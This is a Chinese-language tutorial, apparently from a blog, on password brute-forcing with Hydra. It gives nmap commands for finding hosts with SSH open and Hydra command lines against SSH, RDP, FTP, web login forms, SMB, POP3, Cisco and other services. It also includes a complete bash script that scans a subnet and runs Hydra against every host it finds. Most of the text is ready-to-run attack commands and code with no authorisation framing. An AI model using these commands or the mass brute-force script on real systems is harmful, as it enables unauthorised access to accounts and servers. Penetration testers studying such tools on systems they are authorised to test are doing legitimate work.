使用Hydra批量暴力破解SSH、RDP登录口令
破解环境:Kali 2021.1
使用namp扫描SSH端口开放的主机
nmap -p 22 -n --open 192.168.1.0/24 | grep 192 |awk '{print $5}'
使用Hydra暴力破解
hydra -l root -p ssh_password 192.168.1.103 ssh -vV
#其中-l 指定用户名,-p指定密码,-vV显示详细的执行过程。
hydra -L user.txt -P passwd.txt 192.168.1.103 ssh -t 32 -vV
#其中-L指定用户名字典文件,-P指定密码字典文件,-t指定运行的线程数。
hydra -L user.txt -P passwd.txt 192.168.1.103 ssh -s 222 -t 32 -vV
#其中-s指定端口。
暴力破解:hydra(九头蛇)参数:-R 继续从上一次进度接着破解-S 大写,采用SSL链接-s 小写,可通过这个参数指定非默认端口-l 指定破解的用户,对特定用户破解-L 指定用户名字典-p 小写,指定密码破解,少用,一般是采用密码字典-P 大写,指定密码字典-e 可选选项,n:空密码试探,s:使用指定用户和密码试探-C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数-M 指定目标列表文件一行一条-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解-t 同时运行的线程数,默认为16-w 设置最大超时的时间,单位秒,默认是30s-q 不要打印有关连接错误的消息-o 指定将结果输出到文件-v /-V 显示详细过程各协议的具体命令:格式+示例:1、破解ssh:hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip sshhydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh2、破解ftp:hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vVhydra ip ftp -l 用户名 -P 密码字典 -e ns -vV3、get方式提交,破解web登录:hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP4、post方式提交,破解web登录:hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"hydra -t 3 -l admin -P pass.txt -o out.txt -f 192.168.1.1 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 192.168.1.1目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示5、破解https:hydra -m /index.php -l muts -P pass.txt 192.168.1.1 https6、破解teamspeak:hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak7、破解cisco:hydra -P pass.txt 192.168.1.1 ciscohydra -m cloud -P pass.txt 192.168.1.1 cisco-enable8、破解smb:hydra -L 用户名字典 -P pass.txt 192.168.1.1 smb9、破解pop3:hydra -l muts -P pass.txt my.pop3.mail pop310、破解rdp:hydra ip rdp -l administrator -P pass.txt -V11、破解http-proxy:hydra -l admin -P pass.txt http-proxy://192.168.1.1
使用Hydra配合脚本批量暴力破解
由于hydra一次只能对一个IP进行破解,因此,在shell中写了一个循环,hydra一次任务结束后,立即进行下一个IP的破解,直到将ssh-output.txt文件中IP遍历完为止。SH脚本代码如下所示:
vim hydra.sh
#!/bin/bash
random=$RANDOMif [ $# -lt 4 ]
thenecho "usage: ./hydra-ssh.sh -u root -p ./passwd.txt -s 22 -x ssh -f ./iplist.txt"echo "usage: ./hydra.sh -u root -p ./passwd.txt -s 22 -x ssh -l 192.168.9.0/24"exit 1
fiwhile [ -n "$1" ]
do case "$1" in -u) user=$2shift ;; -p) passfile=$2shift ;; -s) port=$2shift ;; -x) term=$2shift ;; -f) cat $2 > /tmp/IPaddress-output-$random.txtshift ;; -l) nmap -vv -n -sS -sU -p$port $2 | grep "Discovered open port" | awk {'print $6'} | awk -F/ {'print $1'} > /tmp/IPaddress-output-$random.txt shift ;; *) echo "$1 is not an option" echo "usage: ./hydra.sh -u root -p ./passwd.txt -s 22 -x ssh -f ./iplist.txt"echo "usage: ./hydra.sh -u root -p ./passwd.txt -s 22 -x ssh -l 192.168.9.0/24"exit 1;; esac shift
doneecho "-----------Port Scan Finished-----------" >> ./Result-hydra.txtchmod 666 /tmp/IPaddress-output-$random.txtcat /tmp/IPaddress-output-$random.txt | while read line
do echo "Current Task: ${line}" >> ./Result-hydra.txthydra -q -l $user -P $passfile -t 4 -vV -s $port $line $term | grep "host:" >> ./Result-hydra.txt
doneecho "-------Password Guessing Finished-------" >> ./Result-hydra.txtrm -rf /tmp/IPaddress-output-$random.txt
cat ./Result-hydra.txt | grep "host:"
运行程序
./hydra.sh -u root -p ./passwd.txt -s 22 -x ssh -f ./iplist.txt
#对文件中的IP进行破解,-u可指定用户名,-x 指定破解什么(ssh/rdp),-s可指定端口号。
./hydra.sh -u root -p ./passwd.txt -s 22 -x ssh -l 192.168.1.0/24
#对网段中的IP进行破解,-u可指定用户名,-x 指定破解什么(ssh/rdp),-s可指定端口号。
使用Hydra批量暴力破解SSH、RDP登录口令相关推荐
- 第八天 02.hydra暴力破解ssh密码以及ftp密码
hydra暴力破解ssh密码 实验环境: windows7 ,kali 实验步骤: windows进入hydra目录 cd 命令 使用命令爆破SSH hydra -l 用户名 -p 密码字典 ss ...
- Hydra(暴力破解)
Hydra(暴力破解) Hydra 暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大对于社会工程型渗透来说,有时能够得到事半功倍的效果.本文仅从安全角 ...
- 使用Medusa美杜莎暴力破解SSH密码
使用Medusa美杜莎暴力破解SSH密码 1.Medusa简介 Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具.可以同时对多个主机,用户或密码执行强力测试.Medusa和hy ...
- Freebsd 下用 sshguard 防止暴力破解 ssh 密码
2019独角兽企业重金招聘Python工程师标准>>> 在 Freebsd 控制台或用 dmesg -a 查看系统消息的时候会发现类似于下面的大量信息,这是因为有人在尝试暴力破解 S ...
- OSCP-课外1(http万能密码、hydra密码暴力破解http、代码审计、Win缓存区溢出)
目录 难度 主机发现&端口扫描 信息收集 万能密码 hydra密码暴力破解
- hydra暴力破解ssh密码
环境:centos7.0 hydra,是一个非常好用的暴力破解工具,而且名字也很cool. 下面是官网上的介绍: AFP, Cisco AAA, Cisco auth, Cisco enable, C ...
- hydra笔记-利用hydra暴力破解ssh弱口令
这里我搭了台虚拟机.ssh开放的22端口.用户名密码都是root. 下载windows版本的hydra GitHub - maaaaz/thc-hydra-windows at v9.1 解压就可以了 ...
- Linux 利用hosts.deny 防止暴力破解ssh
一.ssh暴力破解 利用专业的破解程序,配合密码字典.登陆用户名,尝试登陆服务器,来进行破解密码,此方法,虽慢,但却很有效果. 二.暴力破解演示 2.1.基础环境:2台linux主机(centos 7 ...
- 用kali Linux暴力破解Windows RDP(3389号端口)
RDP是Windows的远程桌面协议. 我们要暴力破解3389号端口的前提是对方的3389号端口是开放的,不过大多数情况下电脑是默认关闭的,即使有远程协助的需要也不一定非得要用到3389号端口,开启不 ...
最新文章
- 7. Vulnerability exploitation tools (漏洞利用工具 11个)
- Python--粒子滤波定位案例程序
- RMAN SET NEWNAME
- 第一部分 Mysql的基础
- html 文本框 自动拼接,HTML 中table的结构以及拼接
- 下面属于python内置对象的有哪些_Python内置对象实现的方法及注意事项
- 属于服务器端运行的程序_服务器端编程Java 引起人们的注意很大程度上始于 applet...
- 通过hive将excel文件_hive 之 将excel数据导入hive中 : excel 转 txt
- (minio学习过程2)纠错码
- Video.js 使用教程 - 手把手教你基于 Vue 搭建 HTML 5 视频播放器
- Unity Shader - Shader Compilation Target Levels 着色器编译目标级别
- C讲坛之猜数字游戏的实现
- 启用静态NVI的NAT的配置步骤及示例
- fatal: The remote end hung up unexpectedly
- 中兴坠楼事件,愿程序员的世界里,不会再有悲剧
- openlayers 实现风场效果图
- 网络安全--主机探测教程
- https://blog.csdn.net/codezjx/article/details/8872090
- enq: PS - contention
- Excel从入门到精通职场必会课程专题
热门文章
- eth批量归集代币合约部署
- Arm64平台搭建交叉编译开发环境-以FT1500a cpu+Kylin4.0.2-sp2系统为例
- 【Linux】交叉编译linux内核到ARM平台
- 【逗老师带你学IT】Aruba 70xx无线控制器 8.x 版本 Master Redundancy配置
- 实验——基于决策树算法完成鸢尾花卉品种预测任务
- 用python语言实现人工智能猴子摘香蕉的问题_人工智能实验报告大全:猴子摘香蕉问题的VC编程实现等八次 -...
- 概率论与数理统计——事件间的关系
- 基于MATLAB机器视觉的水果分级检测系统的设计
- Build.VERSION_CODES.HONEYCOMB
- Android 使用OpenCV 进行书法字体重影比对